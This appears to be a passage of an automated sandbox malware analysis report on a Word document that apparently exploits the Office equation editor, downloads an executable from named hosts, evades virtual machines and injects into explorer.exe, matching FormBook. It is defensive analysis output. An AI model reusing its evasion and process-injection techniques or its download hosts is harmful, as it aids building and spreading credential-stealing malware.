        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0265DFA1 push ecx; ret
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000ED095 push eax; ret
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000ED0EB push eax; ret
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000ED0E2 push eax; ret
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000ED14C push eax; ret
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000E653F push cs; iretd
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000E771B push eax; retf
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000E67E9 push ebx; ret
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000ED90D push ebx; retf
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\69577.exeJump to dropped file
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\IMG-50230[1].pdfJump to dropped file
        Source: C:\Users\Public\69577.exeFile created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeJump to dropped file
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\69577.exeJump to dropped file
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\IMG-50230[1].pdfJump to dropped file

        Boot Survival:

        barindex
        Drops PE files to the user root directoryShow sources
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\69577.exeJump to dropped file

        Hooking and other Techniques for Hiding and Protection:

        barindex
        Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
        Source: C:\Users\Public\69577.exeFile opened: C:\Users\Public\69577.exe\:Zone.Identifier read attributes | delete
        Source: C:\Users\Public\69577.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion:

        barindex
        Yara detected AntiVM_3Show sources
        Source: Yara matchFile source: Process Memory Space: 69577.exe PID: 2536, type: MEMORY
        Tries to detect virtualization through RDTSC time measurementsShow sources
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeRDTSC instruction interceptor: First address: 00000000000898E4 second address: 00000000000898EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeRDTSC instruction interceptor: First address: 0000000000089B5E second address: 0000000000089B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 00000000000D98E4 second address: 00000000000D98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 00000000000D9B5E second address: 00000000000D9B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00089A90 rdtsc
        Source: C:\Users\Public\69577.exeThread delayed: delay time: 922337203685477
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2332Thread sleep time: -120000s >= -30000s
        Source: C:\Users\Public\69577.exe TID: 2372Thread sleep time: -60000s >= -30000s
        Source: C:\Users\Public\69577.exe TID: 2728Thread sleep time: -2767011611056431s >= -30000s
        Source: C:\Users\Public\69577.exe TID: 2696Thread sleep count: 197 > 30
        Source: 69577.exe, 00000004.00000002.2112502917.0000000003251000.00000004.00000001.sdmpBinary or memory string: VMware
        Source: 69577.exe, 00000004.00000002.2112502917.0000000003251000.00000004.00000001.sdmpBinary or memory string: vmware svga
        Source: explorer.exe, 00000006.00000002.2360960518.00000000001F5000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: explorer.exe, 00000006.00000000.2118650241.0000000004234000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
        Source: explorer.exe, 00000006.00000000.2118741780.0000000004263000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
        Source: 69577.exe, 00000004.00000002.2112502917.0000000003251000.00000004.00000001.sdmpBinary or memory string: vmware
        Source: 69577.exe, 00000004.00000002.2112502917.0000000003251000.00000004.00000001.sdmpBinary or memory string: tpautoconnsvc#Microsoft Hyper-V
        Source: 69577.exe, 00000004.00000002.2112502917.0000000003251000.00000004.00000001.sdmpBinary or memory string: cmd.txtQEMUqemu
        Source: 69577.exe, 00000004.00000002.2112502917.0000000003251000.00000004.00000001.sdmpBinary or memory string: vmusrvc
        Source: explorer.exe, 00000006.00000000.2118547561.00000000041AD000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
        Source: 69577.exe, 00000004.00000002.2112502917.0000000003251000.00000004.00000001.sdmpBinary or memory string: vmsrvc
        Source: 69577.exe, 00000004.00000002.2112502917.0000000003251000.00000004.00000001.sdmpBinary or memory string: vmtools
        Source: 69577.exe, 00000004.00000002.2112502917.0000000003251000.00000004.00000001.sdmpBinary or memory string: vmware sata5vmware usb pointing device-vmware vmci bus deviceCvmware virtual s scsi disk device
        Source: 69577.exe, 00000004.00000002.2112502917.0000000003251000.00000004.00000001.sdmpBinary or memory string: vboxservicevbox)Microsoft Virtual PC
        Source: 69577.exe, 00000004.00000002.2112502917.0000000003251000.00000004.00000001.sdmpBinary or memory string: virtual-vmware pointing device
        Source: explorer.exe, 00000006.00000002.2361009876.0000000000231000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
        Source: C:\Users\Public\69577.exeProcess information queried: ProcessInformation
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeProcess queried: DebugPort
        Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00089A90 rdtsc
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0008ACD0 LdrLoadDll,
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_008526F8 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_026626F8 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\69577.exeProcess token adjusted: Debug
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeProcess token adjusted: Debug
        Source: C:\Users\Public\69577.exeMemory allocated: page read and write | page guard

        HIPS / PFW / Operating System Protection Evasion:

        barindex
        Allocates memory in foreign processesShow sources
        Source: C:\Users\Public\69577.exeMemory allocated: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 80000 protect: page execute and read and write
        Injects a PE file into a foreign processesShow sources
        Source: C:\Users\Public\69577.exeMemory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 80000 value starts with: 4D5A
        Maps a DLL or memory area into another processShow sources
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
        Modifies the context of a thread in another process (thread injection)Show sources
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeThread register set: target process: 1388
        Queues an APC in another process (thread injection)Show sources
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeThread APC queued: target process: C:\Windows\explorer.exe
        Sample uses process hollowing techniqueShow sources
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeSection unmapped: C:\Windows\SysWOW64\rundll32.exe base address: 350000
        Writes to foreign memory regionsShow sources
        Source: C:\Users\Public\69577.exeMemory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 80000
        Source: C:\Users\Public\69577.exeMemory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 81000
        Source: C:\Users\Public\69577.exeMemory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 7EFDE008
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\69577.exe C:\Users\Public\69577.exe
        Source: C:\Users\Public\69577.exeProcess created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
        Source: explorer.exe, 00000006.00000002.2361185402.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Program Manager
        Source: explorer.exe, 00000006.00000002.2361185402.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
        Source: explorer.exe, 00000006.00000002.2360960518.00000000001F5000.00000004.00000020.sdmpBinary or memory string: Progman
        Source: explorer.exe, 00000006.00000002.2361185402.00000000006F0000.00000002.00000001.sdmpBinary or memory string: !Progman
        Source: C:\Users\Public\69577.exeQueries volume information: C:\Users\Public\69577.exe VolumeInformation
        Source: C:\Users\Public\69577.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

        Stealing of Sensitive Information:

        barindex
        Yara detected FormBookShow sources
        Source: Yara matchFile source: 00000005.00000002.2140353140.0000000000081000.00000020.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.2140526407.00000000004D0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.2360758305.00000000000D0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.2112664832.0000000003B66000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.2112815271.0000000003CD3000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.2140472679.0000000000310000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 5.2.AddInProcess32.exe.80000.0.unpack, type: UNPACKEDPE

        Remote Access Functionality:

        barindex
        Yara detected FormBookShow sources
        Source: Yara matchFile source: 00000005.00000002.2140353140.0000000000081000.00000020.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.2140526407.00000000004D0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.2360758305.00000000000D0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.2112664832.0000000003B66000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.2112815271.0000000003CD3000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.2140472679.0000000000310000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 5.2.AddInProcess32.exe.80000.0.unpack, type: UNPACKEDPE

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Spearphishing Link1Shared Modules1Valid Accounts1Valid Accounts1Disable or Modify Tools1OS Credential DumpingFile and Directory Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Valid Accounts1Exploitation for Client Execution13Boot or Logon Initialization ScriptsAccess Token Manipulation1Deobfuscate/Decode Files or Information1LSASS MemorySystem Information Discovery113Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)Process Injection712Obfuscated Files or Information3Security Account ManagerQuery Registry1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing1NTDSSecurity Software Discovery121Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading121LSA SecretsVirtualization/Sandbox Evasion3SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.commonValid Accounts1Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup ItemsAccess Token Manipulation1DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobVirtualization/Sandbox Evasion3Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
        Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection712/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
        Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Hidden Files and Directories1Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
        Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRundll321Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 signatures2 2 Behavior Graph ID: 344787 Sample: IMG-50230.doc Startdate: 27/01/2021 Architecture: WINDOWS Score: 100 43 Found malware configuration 2->43 45 Malicious sample detected (through community Yara rule) 2->45 47 Yara detected AntiVM_3 2->47 49 11 other signatures 2->49 10 EQNEDT32.EXE 13 2->10         started        15 WINWORD.EXE 291 26 2->15         started        process3 dnsIp4 37 67.199.248.11, 49165, 80 GOOGLE-PRIVATE-CLOUDUS United States 10->37 39 neuromedic.com.br 177.70.106.69, 49166, 80 MandicSABR Brazil 10->39 41 bit.ly 10->41 33 C:\Users\user\AppData\...\IMG-50230[1].pdf, PE32 10->33 dropped 35 C:\Users\Public\69577.exe, PE32 10->35 dropped 69 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 10->69 17 69577.exe 12 3 10->17         started        file5 signatures6 process7 file8 31 C:\Users\user\AppData\...\AddInProcess32.exe, PE32 17->31 dropped 51 Machine Learning detection for dropped file 17->51 53 Writes to foreign memory regions 17->53 55 Allocates memory in foreign processes 17->55 57 2 other signatures 17->57 21 AddInProcess32.exe 17->21         started        signatures9 process10 signatures11 59 Modifies the context of a thread in another process (thread injection) 21->59 61 Maps a DLL or memory area into another process 21->61 63 Sample uses process hollowing technique 21->63 65 2 other signatures 21->65 24 explorer.exe 21->24 injected process12 process13 26 rundll32.exe 24->26         started        signatures14 67 Tries to detect virtualization through RDTSC time measurements 26->67 29 cmd.exe 26->29         started        process15

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        No Antivirus matches

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\IMG-50230[1].pdf100%Joe Sandbox ML
        C:\Users\Public\69577.exe100%Joe Sandbox ML
        C:\Users\user\AppData\Local\Temp\AddInProcess32.exe0%MetadefenderBrowse
        C:\Users\user\AppData\Local\Temp\AddInProcess32.exe0%ReversingLabs

        Unpacked PE Files

        SourceDetectionScannerLabelLinkDownload
        5.2.AddInProcess32.exe.80000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

        Domains

        SourceDetectionScannerLabelLink
        neuromedic.com.br1%VirustotalBrowse

        URLs

        SourceDetectionScannerLabelLink
        http://www.mercadolivre.com.br/0%URL Reputationsafe
        http://www.mercadolivre.com.br/0%URL Reputationsafe
        http://www.mercadolivre.com.br/0%URL Reputationsafe
        http://www.mercadolivre.com.br/0%URL Reputationsafe
        http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
        http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
        http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
        http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
        http://www.dailymail.co.uk/0%URL Reputationsafe
        http://www.dailymail.co.uk/0%URL Reputationsafe
        http://www.dailymail.co.uk/0%URL Reputationsafe
        http://www.dailymail.co.uk/0%URL Reputationsafe
        http://www.iis.fhg.de/audioPA0%URL Reputationsafe
        http://www.iis.fhg.de/audioPA0%URL Reputationsafe
        http://www.iis.fhg.de/audioPA0%URL Reputationsafe
        http://www.iis.fhg.de/audioPA0%URL Reputationsafe
        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
        http://ocsp.pki.goog/gts1o1core00%URL Reputationsafe
        http://ocsp.pki.goog/gts1o1core00%URL Reputationsafe
        http://ocsp.pki.goog/gts1o1core00%URL Reputationsafe
        http://ocsp.pki.goog/gts1o1core00%URL Reputationsafe
        http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
        http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
        http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
